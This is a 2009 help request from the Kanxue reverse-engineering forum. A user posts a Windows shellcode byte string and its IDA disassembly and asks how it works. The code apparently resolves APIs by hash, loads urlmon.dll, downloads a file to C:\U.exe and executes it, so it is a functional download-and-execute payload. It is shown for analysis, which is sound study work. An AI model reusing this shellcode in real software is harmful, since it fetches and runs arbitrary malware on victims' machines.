求助]这段shellcode怎么理解？-软件逆向-看雪-安全社区|安全招聘|kanxue.com

求助]这段shellcode怎么理解？

发表于: 2009-8-7 18:56 2920

求助]这段shellcode怎么理解？

人族

2009-8-7 18:56

2920

"\x90\x90\x90\x90\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f\xbe\x14\x28\x38\xf2\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xc3\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\x43\x3a\x5c\x55\x2e\x65\x78\x65\x00\x33\xc0\x64\x03\x40\x30\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x95\xbf\x8e\x4e\x0e\xec\xe8\x84\xff\xff\xff\x83\xec\x04\x83\x2c\x24\x3c\xff\xd0\x95\x50\xbf\x36\x1a\x2f\x70\xe8\x6f\xff\xff\xff\x8b\x54\x24\xfc\x8d\x52\xba\x33\xdb\x53\x53\x52\xeb\x24\x53\xff\xd0\x5d\xbf\x98\xfe\x8a\x0e\xe8\x53\xff\xff\xff\x83\xec\x04\x83\x2c\x24\x62\xff\xd0\xbf\x7e\xd8\xe2\x73\xe8\x40\xff\xff\xff\x52\xff\xd0\xe8\xd7\xff\xff\xff"

mov    esi, [ebp+3Ch]
.data:00422A39 8B 74 35 78                   mov    esi, [ebp+esi+78h]
.data:00422A3D 03 F5                         add    esi, ebp
.data:00422A3F 56                            push esi
.data:00422A40 8B 76 20                      mov    esi, [esi+20h]
.data:00422A43 03 F5                         add    esi, ebp
.data:00422A45 33 C9                         xor    ecx, ecx
.data:00422A47 49                            dec    ecx
.data:00422A47
.data:00422A48
.data:00422A48             loc_422A48:                            ; CODE XREF: sub_422A36+29j
.data:00422A48 41                            inc    ecx
.data:00422A49 AD                            lodsd
.data:00422A4A 33 DB                      xor    ebx, ebx
.data:00422A4A
.data:00422A4C
                                                         movsx edx, byte ptr ss:[eax+ebp]
.data:00422A51 38 F2                         cmp    dl, dh
.data:00422A53 74 08                         jz    short loc_422A5D
.data:00422A53
.data:00422A55 C1 CB 0D                   ror    ebx, 0Dh
.data:00422A58 03 DA                         add    ebx, edx
.data:00422A5A 40                               inc    eax
.data:00422A5B EB EF                         jmp    short loc_422A4C
cmp    ebx, edi
.data:00422A5F 75 E7                         jnz    short loc_422A48
.data:00422A5F
.data:00422A61 5E                            pop    esi
.data:00422A62 8B 5E 24                      mov    ebx, [esi+24h]
.data:00422A65 03 DD                         add    ebx, ebp
.data:00422A67 66 8B 0C 4B                   mov    cx, [ebx+ecx*2]
.data:00422A6B 8B 5E 1C                      mov    ebx, [esi+1Ch]
.data:00422A6E 03 DD                         add    ebx, ebp
.data:00422A70 8B 04 8B                      mov    eax, [ebx+ecx*4]
.data:00422A73 03 C5                         add    eax, ebp
.data:00422A75 C3                            retn

   db  75h ; u
.data:00422A77 72                            db  72h ; r
.data:00422A78 6C                            db  6Ch ; l
.data:00422A79 6D                            db  6Dh ; m
.data:00422A7A 6F                            db  6Fh ; o
.data:00422A7B 6E                            db  6Eh ; n
.data:00422A7C 2E                            db  2Eh ; .
.data:00422A7D 64                            db  64h ; d
.data:00422A7E 6C                            db  6Ch ; l
.data:00422A7F 6C                            db  6Ch ; l
.data:00422A80 00                            db 0
.data:00422A81 43                            db  43h ; C
.data:00422A82 3A                            db  3Ah ; :
.data:00422A83 5C                            db  5Ch ; \
.data:00422A84 55                            db  55h ; U
.data:00422A85 2E                            db  2Eh ; .
.data:00422A86 65                            db  65h ; e
.data:00422A87 78                            db  78h ; x
.data:00422A88 65                            db  65h ; e
.data:00422A89 00                            db 0
.data:00422A8A             ; ---------------------------------------------------------------------------
.data:00422A8A
.data:00422A8A             loc_422A8A:                            ; CODE XREF: .data:00422A34j
.data:00422A8A 33 C0                         xor    eax, eax
.data:00422A8C 64 03 40 30                   add    eax, fs:[eax+30h]
.data:00422A90 78 0C                         js    short loc_422A9E
.data:00422A90
.data:00422A92 8B 40 0C                      mov    eax, [eax+0Ch]
.data:00422A95 8B 70 1C                      mov    esi, [eax+1Ch]
.data:00422A98 AD                            lodsd
.data:00422A99 8B 40 08                      mov    eax, [eax+8]
.data:00422A9C EB 09                         jmp    short loc_422AA7

loc_422AD5:                            ; CODE XREF: .data:loc_422AF9p
.data:00422AD5 53                            push ebx
.data:00422AD6 FF D0                         call eax
.data:00422AD8 5D                            pop    ebp
.data:00422AD9 BF 98 FE 8A 0E                mov    edi, 0E8AFE98h ; <suspicious>
.data:00422ADE E8 53 FF FF FF                call sub_422A36
.data:00422ADE
.data:00422AE3 83 EC 04                      sub    esp, 4
.data:00422AE6 83 2C 24 62                   sub    dword ptr [esp], 62h
.data:00422AEA FF D0                         call eax
.data:00422AEC BF 7E D8 E2 73                mov    edi, 73E2D87Eh ; <suspicious>
.data:00422AF1 E8 40 FF FF FF                call sub_422A36
.data:00422AF1
.data:00422AF6 52                            push edx
.data:00422AF7 FF D0                         call eax
.data:00422AF7
.data:00422AF9
.data:00422AF9             loc_422AF9:                            ; CODE XREF: .data:00422AD3j
.data:00422AF9 E8 D7 FF FF FF                call loc_422AD5

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

#调试逆向

收藏・0

免费・0

支持